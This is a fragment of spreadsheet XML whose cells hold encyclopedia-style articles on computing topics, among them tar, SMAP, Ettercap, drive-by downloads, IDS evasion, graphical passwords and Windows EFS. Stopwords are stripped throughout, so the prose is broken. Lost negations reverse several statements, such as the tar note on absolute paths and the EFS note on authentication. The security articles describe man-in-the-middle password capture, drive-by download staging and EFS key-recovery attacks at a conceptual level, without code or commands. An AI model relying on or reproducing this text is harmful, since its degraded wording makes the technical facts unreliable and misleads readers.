2002 album "enveloped" (cd,lp) defocus. remastered version released 2017. 2003 album "serial human" (cd) merck records, 2005 album "scateren" (ogg digital download) kahvi records. lossless remaster released independently 2016. 2013 "aquanaut" (digital download) released independently bandcamp 2017 (digital download) released independently bandcamp name esem distorted abbreviation capital letters past demoscene alias stereoman. references external links official esem website esem discogs theta video game "minus bells" adium soundset</t>
  </si>
  <si>
    <t>Tape management system</t>
  </si>
  <si>
    <t>tape management system (tms) computer software manages usage retention computer backup tapes. this done stand-alone function part broader backup software package. role tape management system modern tape management system (tms) usually used conjunction backup applications generally used manage magnetic tape media contains backup information electronically stored information. tape management systems used organizations locate, track, rotate media according organizations internal policies well government regulations. categories tape management systems stand-alone tape management systems stand-alone tape management systems predominant mainframe platforms tape used backup base load storage medium. mainframe systems ibm's z/os provide basic support tape inventory control catalog cataloging files optional usually required additional software package following: ensure live tape volumes over-written. keep list tape volumes eligible over-written (known scratch tapes). maintain online catalog location files written tape list files reside tape volume.these operations usually achieved using operating system "hooks" intercept file open close operations. backup applications robotic control systems off-line tape management systems commercially available tape management systems mainframe stand-alone tape management systems brightstore ca-1 (previously known ucc-1 computer associates acquired uccel '87) dynam/tlms (previously known tlms acquired capex corporation '82) control-m/tape (previously known control-t software acquired dimension software '99) zara lascon storage's gfs/afm robotic control/management systems storagetek storagetek exlm distributed systems webscan tape management system tapetrack tape management framework vertices tape management system vaultledger tape management system also list backup software</t>
  </si>
  <si>
    <t>Supervisor Mode Access Prevention</t>
  </si>
  <si>
    <t>supervisor mode access prevention (smap) feature implementations intel broadwell microarchitecture allows supervisor mode programs optionally user-space memory mappings access mappings supervisor mode cause trap. this makes harder malicious programs "trick" kernel using instructions data user-space program. history supervisor mode access prevention designed complement supervisor mode execution prevention (smep), introduced earlier. smep used prevent supervisor mode unintentionally executing user-space code. smap extends protection reads writes. benefits without supervisor mode access prevention, supervisor code usually full read write access user-space memory mappings ability obtain full access). this development several security exploits, including privilege escalation exploits, operate causing kernel access user-space memory intend operating systems block exploits using smap force unintended user-space memory accesses trigger page faults. additionally, smap expose flawed kernel code follow intended procedures accessing user-space memory.however, smap operating system lead larger kernel size slower user-space memory accesses supervisor code, smap must temporarily disabled time supervisor code intends access user-space memory. technical details processors indicate support supervisor mode access prevention extended features cpuid leaf. smap enabled memory paging active smap control register set. smap temporarily disabled explicit memory accesses setting eflags.ac (alignment check) flag. stac (set flag) clac (clear flag) instructions used easily clear flag.when smap set, explicit memory reads writes user-mode pages performed code running privilege level less always result page fault eflags.ac flag set. implicit reads writes (such made descriptor tables) user-mode pages always trigger page fault smap enabled, regardless value eflags.ac. operating system support linux kernel support supervisor mode access prevention implemented peter anvin. merged mainline linux kernel enabled default processors support feature.freebsd supported supervisor mode execution prevention since 2012 supervisor mode access prevention since 2018.openbsd supported supervisor mode access prevention related supervisor mode execution prevention since 2012, openbsd first release support feature enabled.netbsd support supervisor mode execution prevention (smep) implemented maxime villard december 2015. support supervisor mode access prevention (smap) also implemented maxime villard, august 2017. netbsd first release features supported enabled.haiku support supervisor mode execution prevention (smep) implemented jérôme duval january 2018.macos support smap least since macos 10.13 released 2017. also references</t>
  </si>
  <si>
    <t>Superuser</t>
  </si>
  <si>
    <t>Ettercap (software)</t>
  </si>
  <si>
    <t>ettercap free open source network security tool man-in-the-middle attacks lan. used computer network protocol analysis security auditing. runs various unix-like operating systems including linux, solaris, microsoft windows. capable intercepting traffic network segment, capturing passwords, conducting active eavesdropping number common protocols. original developers later founded hacking team. functionality ettercap works putting network interface promiscuous mode poisoning target machines. thereby 'man middle' unleash various attacks victims. ettercap plugin support features extended adding plugins. features ettercap supports active passive dissection many protocols (including ciphered ones) provides many features network host analysis. ettercap offers four modes operation: ip-based: packets filtered based source destination. mac-based: packets filtered based address, useful sniffing connections gateway. arp-based: uses poisoning sniff switched hosts (full-duplex). publicarp-based: uses poisoning sniff switched victim host hosts (half-duplex).in addition, software also offers following features: character injection established connection: characters injected server (emulating commands) client (emulating replies) maintaining live connection. ssh1 support: sniffing username password, even data ssh1 connection. ettercap first software capable sniffing connection full duplex. https support: sniffing http secured data—even connection made proxy. remote traffic tunnel: sniffing remote traffic tunnel remote cisco router, perform man-in-the-middle attack plug-in support: creation custom plugins using ettercap's api. password collectors for: telnet, ftp, pop, imap, rlogin, ssh1, icq, smb, mysql, http, nntp, x11, napster, irc, rip, bgp, socks imap vnc, ldap, nfs, snmp, msn, ymsg packet filtering/dropping: setting filter searches particular string hexadecimal sequence) payload replaces custom string/sequence choice, drops entire packet. tcp/ip stack fingerprinting: determine victim host network adapter. kill connection: killing connections choice connections-list. passive scanning lan: retrieval information hosts lan, open ports, version numbers available services, type host (gateway, router simple estimated distances number hops. hijacking requests.ettercap also ability actively passively find poisoners lan. also arpon arpwatch references external links official website article "реагирование инциденты информационной безопасности" article "ettercap: универсальный анализатор трафика"</t>
  </si>
  <si>
    <t>Encrypting PIN Pad</t>
  </si>
  <si>
    <t>encrypting apparatus encrypting identifier entered keypad. these used automated teller machines ensure unencrypted stored transmitted anywhere rest system thus cannot revealed accidentally manipulations system. apparatus apparatus includes pad, encrypting circuit adjacent link coupling encrypting circuit. entering identifier, circuit encrypting entered identifier. physical touch n-wire technology touch pad. alternatively, virtual touch screen. encrypting circuit along memory coupled programmed encrypt. programmed memory first programmable encrypt entered identifier, identifier passes. encrypting circuit micro controller programmed encrypt. still another variation, encrypting circuit application-specific integrated circuit (asic). apparatus include housing encloses encrypting circuit link. housing would resistant access, tampering tapping. housing least partially chip-on-glass technology. encrypting circuit embedded housing, link. method encrypting identifier includes placing entering identifier, circuit encrypting identifier link communicative coupling circuit adjacent access-resistant housing. identifier entered communicated encrypting circuit. encrypting circuit encrypts identifier. encrypted identifier forwarded verification. references patent 7305565, james lungaro, susan tso, llavanya fernando, simon lee, "secure, encrypting pad", issued 2007-12-04</t>
  </si>
  <si>
    <t>Superscan</t>
  </si>
  <si>
    <t>superscan free connect-based port scanning software designed detect open ports target computer, determine services running ports, queries whois, ping, icmp traceroute, hostname lookups.superscan completely rewritten update superscan (version released 2000), features windows enumeration, list variety important information dealing microsoft windows netbios information user group accounts network shares trusted domains services either running stoppedsuperscan tool used system administrators, crackers script kiddies evaluate computer's security. system administrators test possible unauthorised open ports computer networks, whereas crackers scan insecure ports order gain illegal access system. references</t>
  </si>
  <si>
    <t>Drive-by download</t>
  </si>
  <si>
    <t>drive-by download types, concerning unintended download computer software internet: authorized drive-by downloads downloads person authorized without understanding consequences (e.g. downloads install unknown counterfeit executable program, activex component, java applet). unauthorized drive-by downloads downloads happen without person's knowledge, often computer virus, spyware, malware, crimeware.drive-by downloads happen visiting website, opening e-mail attachment clicking link, clicking deceptive pop-up window: clicking window mistaken belief that, example, error report computer's operating system acknowledged seemingly innocuous advertisement pop-up dismissed. cases, "supplier" claim user "consented" download, although user fact unaware started unwanted malicious software download. similarly person visiting site malicious content, person become victim drive-by download attack. that malicious content able exploit vulnerabilities browser plugins malicious code without user's knowledge.a drive-by install installation) similar event. refers installation rather download (though sometimes terms used interchangeably). process when creating drive-by download, attacker must first create malicious content perform attack. with rise exploit packs contain vulnerabilities needed carry unauthorized drive-by download attacks, skill level needed perform attack reduced.the next step host malicious content attacker wishes distribute. option attacker host malicious content server. however, difficulty directing users page, also hosted compromised legitimate website, legitimate website unknowingly distributing attackers content third party service (e.g. advertisement). when content loaded client, attacker analyze fingerprint client order tailor code exploit vulnerabilities specific client.finally, attacker exploits necessary vulnerabilities launch drive-by download attack. drive-by downloads usually strategies. first strategy exploiting calls various plugins. example, downloadandinstall sina activex component properly check parameters allowed downloading execution arbitrary files internet. second strategy involves writing shellcode memory, exploiting vulnerabilities browser plugin divert control flow program shell code. after shellcode executed, attacker perform malicious activities. this often involves downloading installing malware, anything, including stealing information send back attacker.the attacker also take measures prevent detection throughout attack. method rely obfuscation malicious code. this done iframes. another method encrypt malicious code prevent detection. generally attacker encrypts malicious code ciphertext, includes decryption method ciphertext. detection prevention detection drive-by download attacks active area research. some methods detection involve anomaly detection, tracks state changes user's computer system user visits webpage. this involves monitoring user's computer system anomalous changes page rendered. other methods detection include detecting malicious code (shellcode) written memory attacker's exploit. another detection method make run-time environments allow javascript code track behavior runs. other detection methods include examining contents html pages identify features used identify malicious pages, using characteristics servers determine page malicious. some antivirus tools static signatures match patterns malicious scripts, although effective obfuscation techniques. detection also possible using low-interaction high-interaction honeyclients.drive-by downloads also prevented occurring using script-blockers noscript, easily added browsers firefox. using script-blocker, user disable scripts given webpage, selectively re-enable individual scripts one-by-one basis order determine ones truly necessary webpage functionality. however, script-blocking tools unintended consequences, breaking parts websites, balancing act. also malvertising phishing blade flashback windows metafile vulnerability dropper (malware) references</t>
  </si>
  <si>
    <t>Tar (computing)</t>
  </si>
  <si>
    <t>computing, computer software utility collecting many files archive file, often referred tarball, distribution backup purposes. name derived "tape archive", originally developed write data sequential devices file system own. archive data sets created contain various file system parameters, name, timestamps, ownership, file-access permissions, directory organization. posix abandoned favor pax, sees continued widespread use. history command-line utility first introduced version unix january 1979, replacing program (which turn replaced "tap"). file structure store information standardized posix.1-1988 later posix.1-2001, became format supported modern file archiving systems. command abandoned posix.1-2001 favor command, support ustar file format; command indicated withdrawal favor command least since 1994. today, unix-like operating systems usually include tools support files, well utilities commonly used compress them, gzip bzip2. command also ported operating system.bsd-tar included microsoft windows since windows april 2018 update, otherwise multiple third party tools available read write formats windows. rationale many historic tape drives read write variable-length data blocks, leaving significant wasted space tape blocks (for tape physically start stop moving). some tape drives (and disks) support fixed-length data blocks. also, writing medium file system network, takes less time write large block many small blocks. therefore, command writes data records many blocks. user specify blocking factor, number blocks record. default producing records. file format there multiple file formats, including historical current ones. formats codified posix: ustar pax. codified still current format. archive consists series file objects, hence popular term tarball, referencing tarball collects objects kinds stick surface. each file object includes file data, preceded 512-byte header record. file data written unaltered except length rounded multiple bytes. original implementation care contents padding bytes, left buffer data unaltered, modern implementations fill extra space zeros. archive marked least consecutive zero-filled records. (the origin tar's record size appears 512-byte disk sectors used version unix file system.) final block archive padded full length zeros. header file header record contains metadata file. ensure portability across different architectures different byte orderings, information header record encoded ascii. thus files archive ascii text files, ascii names, archive essentially ascii text file (containing many characters). fields defined original unix format listed table below. link indicator/file type table includes modern extensions. when field unused filled bytes. header uses bytes, padded bytes make fill byte record. there "magic number" header, file identification. pre-posix.1-1988 (i.e. header: pre-posix.1-1988 link indicator field following values: some pre-posix.1-1988 implementations indicated directory trailing slash name. numeric values encoded octal numbers using ascii digits, leading zeroes. historical reasons, final space character also used. thus although bytes reserved storing file size, octal digits stored. this gives maximum file size gigabytes archived files. overcome limitation, 2001 star introduced base-256 coding indicated setting high-order leftmost byte numeric field. gnu-tar bsd-tar followed idea. additionally, versions first posix standard 1988 values spaces instead zeroes. checksum calculated taking unsigned byte values header record eight checksum bytes taken ascii spaces (decimal value 32). stored digit octal number leading zeroes followed space. various implementations adhere format. addition, historic implementations treated bytes signed. implementations typically calculate checksum ways, treat good either signed unsigned matches included checksum. unix filesystems support multiple links (names) file. several files appear archive, first archived normal file; rest archived hard links, "name linked file" field first one's name. extraction, hard links recreated file system. ustar format most modern programs read write archives ustar (unix standard tar) format, introduced posix ieee p1003.1 standard 1988. introduced additional header fields. older programs ignore extra information (possibly extracting partially named files), newer programs test presence "ustar" string determine format use. ustar format allows longer file names stores additional information file. maximum filename size 256, split among preceding path "filename prefix" filename itself, much less. type flag field following values: posix.1-1988 vendor specific extensions using link flag values 'a'–'z' partially different meaning different vendors thus seen outdated replaced posix.1-2001 extensions also include vendor tag. type (contiguous file) formally marked reserved posix standard, meant indicate files ought contiguously allocated disk. operating systems support creating files explicitly, hence programs support them, treat type files type (regular). exception older versions tar, running masscomp (real time unix) operating system, supported o_ctg flag open() function request contiguous file; however, support removed version 1.24 onwards. posix.1-2001/pax 1997, proposed method adding extensions format. this method later accepted posix.1-2001 standard. this format known extended format format. format allows users type vendor-tagged vendor-specific enhancements. following tags defined posix standard: atime, mtime: timestamps file arbitrary resolution (most implementations nanosecond granularity) path: path names unlimited length character coding linkpath: symlink target names unlimited length character coding uname, gname: user group names unlimited length character coding size: files unlimited size (the historic format uid, gid: userid groupid without size limitation (this historic format limited max. 2097151) character definition path names user/group names (utf-8)in 2001, star program became first support format. 2004, supported format, though write default output program yet.the format designed implementations able read ustar format able read format well. exceptions files make extended features, longer file names. compatibility, encoded files special type files, typically paxheaders.xxxx directory.: exthdr.name pax-supporting implementation would make information, non-supporting ones like 7-zip would process additional files. uses command syntax [-options] &lt;name archive&gt; [files directories archive] basic options: --create create archive; --auto-compress additionally compress archive compressor automatically determined file name extension archive. archive's name ends *.tar.gz gzip, *.tar.xz *.tar.zst zstandard etc.; --append append files archive; --extract, --get extract files archive; --file specify archive's name; --list show list files folders archive; --verbose show list processed files. basic usage create archive file archive.tar file readme.txt directory src: extract contents archive.tar current directory: create archive file archive.tar.gz file readme.txt directory compress gzip extract contents archive.tar.gz current directory: tarpipe tarpipe method creating archive standard output file utility piping another process standard input, working another directory, unpacked. this process copies entire source directory tree including special files, example: software distribution format continues used extensively open-source software distribution. *nix-distributions various source- binary-package distribution mechanisms, software source code made available compressed archives. limitations original format created early days unix, despite current widespread use, many design features considered dated.many older implementations record restore extended attributes (xattrs) access-control lists (acls). 2001, star introduced support acls extended attributes, tags posix.1-2001 pax. bsdtar uses star extensions support acls. more recent versions support linux extended attributes, reimplementing star extensions. number extensions reviewed filetype manual tar, tar(5).other formats created address shortcomings tar. tarbomb tarbomb, hacker slang, file contains many files extract working directory. such file create problems overwriting files name working directory, mixing project's files another. best inconvenience user, obliged identify delete number files interspersed directory's contents. such behavior considered etiquette part archive's creator. related problem absolute paths parent directory references creating files. files extracted archives often created unusual locations outside working directory and, like tarbomb, potential overwrite existing files. however, modern versions freebsd create extract absolute paths parent-directory references default, unless explicitly allowed flag option --absolute-names. bsdtar program, also available many operating systems default utility v10.6, also follow parent-directory references symbolic links.if user available, feature security measures, problems mitigated first examining file using command archive.tar, lists contents allows exclude problematic files afterwards. these commands extract files, display names files archive. problematic, user create empty directory extract archive it—or avoid file entirely. most graphical tools display contents archive extracting them. open archives display contents. emacs also able open archive display contents dired buffer. random access format designed without centralized index table content files properties streaming tape backup devices. archive must read sequentially list extract files. large archives, causes performance penalty, making archives unsuitable situations often require random access individual files. duplicates another issue format allows several (possibly different) files archive identical path filename. when extracting archive, usually latter version file overwrites former. this create non-explicit (unobvious) tarbomb, technically contain files absolute paths referring parent directories, still causes overwriting files outside current directory (for example, archive contain files path filename, first symlink location outside current directory, second regular file; extracting archive implementations cause writing location pointed symlink). implementations historically, many systems implemented tar, many general file archivers least partial support (often using implementations below). history story incompatibilities, known "tar wars". most implementations also read create cpio (the latter actually tar-format posix-2001-extensions). implementations order origin: solaris tar, based original unix comes default solaris operating system default linux distributions. based public domain implementation pdtar started 1987. recent versions various formats, including ustar, pax, formats. freebsd (also tar) become default berkeley software distribution-based operating systems including core functionality available libarchive inclusion applications. this implementation automatically detects format file extract tar, pax, cpio, zip, rar, xar, 9660 cdrom images. also comes functionally equivalent cpio command-line interface. schily tar, better known star, historically significant extensions quite popular. first published april 1997, developer stated began development 1982. python tarfile module supports multiple formats, including ustar, gnu; read create format sunos extended format; default format creation archives. available since 2003.additionally, cpio implementations read create multiple types files. suffixes compressed files archive files usually file suffix .tar (e.g. somefile.tar). archive file contains uncompressed byte streams files contains. achieve archive compression, variety compression programs available, gzip, bzip2, lzip, lzma, zstd, compress, compress entire archive. typically, compressed form archive receives filename appending format-specific compressor suffix archive file name. example, archive archive.tar, named archive.tar.gz, compressed gzip. popular programs like versions support command line options (compress), (gzip), (bzip2) compress decompress archive file upon creation unpacking. relatively recent additions include --lzma (lzma), --lzop (lzop), --xz (xz), --lzip (lzip), --zstd. decompression formats handled automatically supported filename extensions used, compression handled automatically using filename extensions option --auto-compress (short form passed applicable version tar. detects even wider range compressors (lrzip, lz4), using filename data within. unrecognized formats manually compressed decompressed piping. ms-dos's filename limitations resulted additional conventions naming compressed archives. however, practice declined offering long filenames. also comparison file archivers comparison archive formats list archive formats list unix commands references external links x/open specification commands utilities issue version (pdf), 1994, opengroup.org indicates withdrawn single unix specification, version 1997, opengroup.org indicates applications migrate utility utilities open group base specifications issue 2004 edition, opengroup.org indicates removed shell utilities reference, single unix specification, version open group specifies ustar file formats tar(1) version unix programmer's manual tar(1) manual tar(1) plan programmer's manual, volume tar(1) solaris user commands reference manual tar(1) freebsd general commands manual tar(1) openbsd general commands manual tar(1) linux user manual user commands tar(5) freebsd file formats manual windows ss64.com</t>
  </si>
  <si>
    <t>Everex green computer</t>
  </si>
  <si>
    <t>mid-2000s, everex began selling several brands green computers. these computers targeted users need access applications, versus microsoft windows-based applications (however, company sell windows vista-installed variants). hardware gbook "gbook" laptop 15.4" wxga+ widescreen display (1440 900) c7-m processor. comes loaded linux. major variants exist: based linux; other, impact brand windows vista low-power machines. both utilize cpu. also ships softmodem enabled consumer use, provided "for developers." sequel, gpc2, available wal-mart. third, gpc3, sempron processor, ram, ubuntu 8.04, available newegg. mini mini, small, light nettop computer, announced april 2008: includes recorder, video output, myspace-driven content space. intended competitor mini. cloudbook cloudbook ultra-mobile running either linux windows vista. there also stepnote variant uses pentium dual-core cpu, instead software linux used lower-end models cloudbook. core application suite built upon google apps, many applications installed. models windows vista home basic, installed base applications. photos references external links computerworld article microsoft reserving future installs related machines article "gpc mini" targeted myspace users</t>
  </si>
  <si>
    <t>Draw a Secret</t>
  </si>
  <si>
    <t>draw secret (das) graphical password input scheme developed jermyn, alain mayer, fabian monrose, michael reiter aviel rubin presented paper usenix security symposium augusts 1999.the scheme replaces alphanumeric password strings picture drawn grid. instead entering alphanumeric password, authentication method allows users gestures drawn grid authenticate. user's drawing mapped grid order coordinate pairs used draw password recorded sequence. coordinates inserted recorded "password" sequence user ends stroke (the motion pressing screen mouse begin drawing followed taking stylus mouse create line shape) begins another grid. overview das, password picture drawn free-form grid size each grid cell denoted two-dimensional discrete coordinates completed drawing, i.e., secret, encoded ordered sequence cells user crosses whilst constructing secret.the predominant argument favor graphical alphanumeric passwords picture superiority effect describes improved performance human mind recalling images objects strings text. this effect utilized das, complex drawings less difficult human mind memorize long string alphanumeric characters. this allows user input stronger secure sequences graphical password input schemes conventional text input relative ease. variations background draw secret (bdas) this variation original scheme meant improve security scheme ease verification user. grid used original draw secret, background image simply shown grid. background image aids reconstruction difficult remember passwords. this using original system, user must remember strokes associated password also grid cells strokes pass through. this introduce difficulty grid cells alike uniqueness. with bdas, user choose image place grid unique features correct placement drawing. study done newcastle university showed background image, participants study tended construct complex pass phrases (e.g. larger length stroke count) others used das, though rate recall one-week period showed almost identical percentage participants ability recall sequences bdas sequences. rotational draw secret (r-das) r-das variation original draw secret system whereby user allowed rotate drawing grid either strokes sequence entire sequence inputted "secret" drawn. after rotation done, following rotations direction, without counter rotation different direction treated rotation.an example added password strength shown below:if original password entered follows (presented sequence strokes grid): (1,1)(2,1)(3,1)(4,1)(5,1)(6)(5,1)(5,2)(5,3)(5,4)(5,5)(6)(1,1)(1,2)(1,3)(1,4)(1,5)(6)(3,1)(3,2)(3,3)(6) with r-das, multiple directional changes inserted increase security: (1,1)(2,1)(3,1)(4,1)(5,1)(6) (-90) (5,1)(5,2)(5,3)(5,4)(5,5)(6) (+90) (-45) (1,1)(1,2)(1,3)(1,4)(1,5)(6) (+225) (3,1)(3,2)(3,3)(6) (+180) security issues multiple accepted passwords encoding particular secret one-to-many relationship possible drawings represent. this implies drawing fact accepted successful authentication user. this especially true small number cells grid. resolve issue, cells included grid. this process makes difficult cross cells required fulfill password sequence. cost added security increase difficulty reproduce password actual user. cells present grid, accurate user must entering password stroke required cells correct order. graphical dictionary attacks through common "hotspots" "points-of-interest" grid background image, graphical dictionary attack initiated guess users' passwords other factors similar shapes objects background image also form "click order" vulnerabilities shapes clumped together used sequence these attacks common background variation draw secret utilizes image used exploit vulnerabilities explained above. study 2013 also showed users tendency similar password selection processes across different background images. shoulder surfing attacks this form attack initiated bystander watching user enter password. this attack present input schemes authentication, schemes especially vulnerable users strokes displayed screen see. this unlike alphanumeric text input characters entered actually displayed screen. three techniques designed protecting bdas systems shoulder surfing attacks: decoy strokes strikes inputted simply confuse potential onlookers, differentiated colors chosen user. disappearing strokes stroke removed screen inputted user. line snaking extension disappearing strokes method, shortly stroke started, stroke begins disappearing shortly after, giving appearance "line snaking" implementations initial implementation pdas (personal digital assistant). recently release windows microsoft included option switching "picture password". this essentially implementation bdas requires choice picture background) limited three gesture sequence password reducing actual security bdas provides conventional alphanumerical passwords. references</t>
  </si>
  <si>
    <t>TCP Gender Changer</t>
  </si>
  <si>
    <t>gender changer method computer networking making internal tcp/ip based network server accessible beyond protective firewall. mechanism consists nodes, resides internal local area network access desired server, node runs outside local area network, client access these nodes respectively called (connect-connect) (listen-listen). reason behind naming nodes fact connect-connect node initiates connections listen-listen node actual server. listen-listen node, however, passively listens tcp/ip ports, receive connection incoming connection client. node, runs inside network establish control connection waiting ll's signal open connection internal server. upon receiving client connection signal node connect server, done know result successful keep client connection thus client server communicate relay data back forth. cases cases useful connect desktop machine behind firewall running vnc, would make desktop remotely accessible network beyond firewall. another useful scenario would create using ssh, even simply using connect internal unix based server. also firewall (computing) network security references external links complete explanation working mechanism article explaining idea implementations tgcd, gender changer daemon unix daemon implementation gender changer method (gnu revinetd implementation gender changer (gnu implementation using socat utility (gnu openssl linking exception) firewall tunnel firewall tunnel based gender changer method (gnu</t>
  </si>
  <si>
    <t>Sun xVM</t>
  </si>
  <si>
    <t>product line microsystems addressed virtualization technology platforms. component discontinued oracle acquisition sun; remaining continue oracle branding. history originally announced product family october 2007. brand time encompassed server, center, virtualbox, latter products abandoned "xvm" branding late 2009, called oracle enterprise manager center oracle virtualbox. products hypervisor hypervisor component solaris based work done opensolaris community. integrated opensolaris source base, available opensolaris distributions, providing standard features xen-based hypervisor x86-based systems. server server based hypervisor project. planned support microsoft windows, linux, solaris guest operating systems. various features sun's opensolaris underlay guest part hypervisor environment, including predictive self healing, zfs, dtrace, advanced network bandwidth management (from opensolaris crossbow project) well security enhancements.instead disk image format, server intended import/export vmdk images facilitate interoperation vmware server microsoft's hyper-v.in early 2009, community opensolaris.org announced separate server development would discontinued such, xen/opensolaris project filling role team previously worked server refocusing center principal means managing multiple hypervisors multiple physical machines single point control. steve wilson said hypervisor support would part commercial solaris. also oracle server oracle server sparc oracle references external links blog solaris operating system hardware virtualization product architecture opensolaris.org understanding hypervisor architecture hypervisor overview bigadmin</t>
  </si>
  <si>
    <t>Evil bit</t>
  </si>
  <si>
    <t>evil fictional ipv4 packet header field proposed 3514, humorous april fools' 2003 authored steve bellovin. recommended last remaining unused bit, "reserved bit" ipv4 packet header, used indicate whether packet sent malicious intent, thus making computer security engineering easy problem simply ignore messages evil trust rest. influence evil become synonym attempts seek simple technical solutions difficult human social problems require willing participation malicious actors, particular efforts implement internet censorship using simple technical solutions. joke, freebsd implemented support evil removed changes next day. linux patch implementing iptables module "ipt_evil" posted next year. furthermore, patch freebsd available kept up-to-date. there extension xmpp protocol "xep-0076: malicious stanzas", inspired evil bit. this also quoted otherwise completely serious 3675, ".sex considered dangerous", caused proponents .xxx wonder whether internet engineering task force (ietf) commenting application top-level domain (tld) document related application.for april fool's 2010, google added &amp;evil=true parameter requests ajax apis. also technological track http references</t>
  </si>
  <si>
    <t>Evasion (network security)</t>
  </si>
  <si>
    <t>network security, evasion bypassing information security defense order deliver exploit, attack, form malware target network system, without detection. evasions typically used counter network-based intrusion detection prevention systems (ips, ids) also used by-pass firewalls defeat malware analysis. target evasions crash network security defense, rendering in-effective subsequent targeted attacks. description evasions particularly nasty well-planned implemented evasion enable full sessions carried forth packets evade ids. attacks carried sessions happen right nose network service administrators. security systems rendered ineffective well-designed evasion techniques, stealth fighter attack without detection radar defensive systems. good analogy evasions system designed recognize keywords speech patterns phone system, “break system simple evasion would language english, parties still understand, wishfully language people possible talk. evasion attacks various advanced targeted evasion attacks known since mid-1990s: seminal text describing attacks systems appeared 1997. first comprehensive description attacks reported ptacek newsham technical report 1998. 1998, also article phrack magazine describes ways by-pass network intrusion detection. reports 1997 article mostly discusses various shell-scripting character-based tricks fool ids. phrack magazine article technical report ptacek discusses tcp/ip protocol exploits, evasions others. more recent discussions evasions include report kevin timm. protecting evasions challenge protecting servers evasions model end-host operation network security device, i.e., device able know target host would interpret traffic, would harmful, not. solution protecting evasions traffic normalization ids/ips device.lately discussions putting effort research evasion techniques. presentation hack.lu discussed potentially evasion techniques apply multiple evasion techniques by-pass network security devices. also metasploit project references singh, abhishek. "evasions intrusion prevention detection systems". virus bulletin. retrieved april 2010.</t>
  </si>
  <si>
    <t>Encrypting File System</t>
  </si>
  <si>
    <t>encrypting file system (efs) microsoft windows feature introduced version ntfs provides filesystem-level encryption. technology enables files transparently encrypted protect confidential data attackers physical access computer. available versions windows except home versions (see supported operating systems below) windows 2000 onwards. default, files encrypted, encryption enabled users per-file, per-directory, per-drive basis. some settings also mandated group policy windows domain environments.cryptographic file system implementations operating systems available, microsoft compatible them. also list cryptographic file systems. basic ideas when operating system running system without file encryption, access files normally goes os-controlled user authentication access control lists. however, attacker gains physical access computer, barrier easily circumvented. way, example, would remove disk another computer installed read filesystem; another, would simply reboot computer boot containing suitable accessing local filesystem. widely accepted solution store files encrypted physical media (disks, drives, tapes, on). microsoft windows family operating systems enables measure, although ntfs drives only, using combination public cryptography symmetric cryptography make decrypting files extremely difficult without correct key. however, cryptography keys practice protected user account password, therefore susceptible password attacks. words, encryption file strong password unlock decryption key. operation works encrypting file bulk symmetric key, also known file encryption key, fek. uses symmetric encryption algorithm takes less time encrypt decrypt large amounts data asymmetric cipher used. symmetric encryption algorithm used vary depending version configuration operating system; algorithms used windows version below. (the symmetric used encrypt file) encrypted public associated user encrypted file, encrypted stored $efs alternative data stream encrypted file. decrypt file, component driver uses private matches digital certificate (used encrypt file) decrypt symmetric stored $efs stream. component driver uses symmetric decrypt file. because encryption decryption operations performed layer ntfs, transparent user applications. folders whose contents encrypted file system marked encryption attribute. component driver treats encryption attribute analogous inheritance file permissions ntfs: folder marked encryption, default files subfolders created folder also encrypted. when encrypted files moved within ntfs volume, files remain encrypted. however, number occasions file could decrypted without user explicitly asking windows files folders decrypted copied volume formatted another file system, like fat32. finally, encrypted files copied network using smb/cifs protocol, files decrypted sent network. significant preventing decryption-on-copy using backup applications aware "raw" apis. backup applications implemented apis simply copy encrypted file stream $efs alternative data stream single file. words, files "copied" (e.g. backup file) encrypted form, decrypted backup. starting windows vista, user's private stored smart card; data recovery agent (dra) keys also stored smart card. security vulnerabilities significant security vulnerabilities existed windows 2000 efs, variously targeted since. windows 2000, local administrator default data recovery agent, capable decrypting files encrypted local user. windows 2000 cannot function without recovery agent, always someone decrypt encrypted files users. non-domain-joined windows 2000 computer susceptible unauthorized decryption anyone take local administrator account, trivial given many tools available freely internet.in windows later, default local data recovery agent requirement one. setting syskey mode (syskey typed bootup stored floppy disk) mitigate risk unauthorized decryption local administrator account. this local user's password hashes, stored file, encrypted syskey, syskey value available offline attacker possess syskey passphrase/floppy. accessing private password reset windows 2000, user's private stored truly encrypted form, also backup user's private weakly protected. attacker gains physical access windows 2000 computer resets local user account's password, attacker user recovery agent) gain access private decrypt files. this backup user's private encrypted secret, accessible attacker elevate login localsystem (again, trivial given numerous tools internet). windows beyond, user's private backed using offline public whose matching private stored places: password reset disk windows member domain) active directory windows member domain). this means attacker authenticate windows localsystem still access decryption stored pc's hard drive. windows 2000, later, user's private encrypted using hash user's ntlm password hash plus user name salted hash makes extremely difficult reverse process recover private without knowing user's passphrase. also, again, setting syskey mode (syskey typed bootup stored floppy disk) mitigate attack, since local user's password hash stored encrypted file. other issues once user logged successfully, access encrypted data requires additional authentication, decryption happens transparently. thus, compromise user's password automatically leads access data. windows store versions user account passphrases reversible encryption, though longer default behaviour; also configured store (and default original version windows lower) manager hashes local user account passphrases, attacked broken easily. also stores local user account passphrases ntlm hashes, fairly easily attacked using "rainbow tables" passwords weak (windows vista later versions allow weak passwords default). mitigate threat trivial brute-force attacks local passphrases, older versions windows need configured (using security settings portion group policy) never store hashes, course, enable autologon (which stores plaintext passphrases registry). further, using local user account passphrases characters long prevents windows storing hash added benefit making brute-force attacks ntlm hash harder. when encrypting files converting plaintext files encrypted files plaintext files wiped, simply deleted (i.e. data blocks flagged "not use" filesystem). this means that, unless example happen stored trim support, easily recovered unless overwritten. fully mitigate known, non-challenging technical attacks efs, encryption configured folder level temporary files like word document backups created directories also encrypted). when encrypting individual files, copied encrypted folder encrypted place", followed securely wiping disk volume. windows cipher utility used (with option) wipe free space including still contains deleted plaintext files; various third-party utilities work well.anyone gain administrators access overwrite, override change data recovery agent configuration. this serious issue, since attacker example hack administrator account (using third-party tools), whatever certificate want data recovery agent wait. this sometimes referred two-stage attack, significantly different scenario risk lost stolen highlights risk malicious insiders. when user encrypts files first stage attack, feks automatically encrypted designated dra's public key. attacker needs access computer administrator gain full access subsequently efs-encrypted files. even using syskey mode protect attack, attacker could back encrypted files offline, restore elsewhere dra's private decrypt files. malicious insider gain physical access computer, security features considered irrelevant, could also install rootkits, software even hardware keyloggers etc. computer potentially much interesting effective overwriting policy. recovery files encrypted decrypted using private key(s) matching previously used public key(s). stored copy user's private ultimately protected user's logon password. accessing encrypted files outside windows operating systems (linux, example) possible least currently third party component driver. further, using special tools reset user's login password render impossible decrypt user's private thus useless gaining access user's encrypted files. significance occasionally lost users, resulting data loss user forgets password, fails back encryption key. this coining term "delayed recycle bin", describe seeming inevitability data loss inexperienced user encrypts files. configured keys issued public infrastructure configured enable archival recovery, encrypted files recovered recovering private first. keys user password smart card private key): used generate 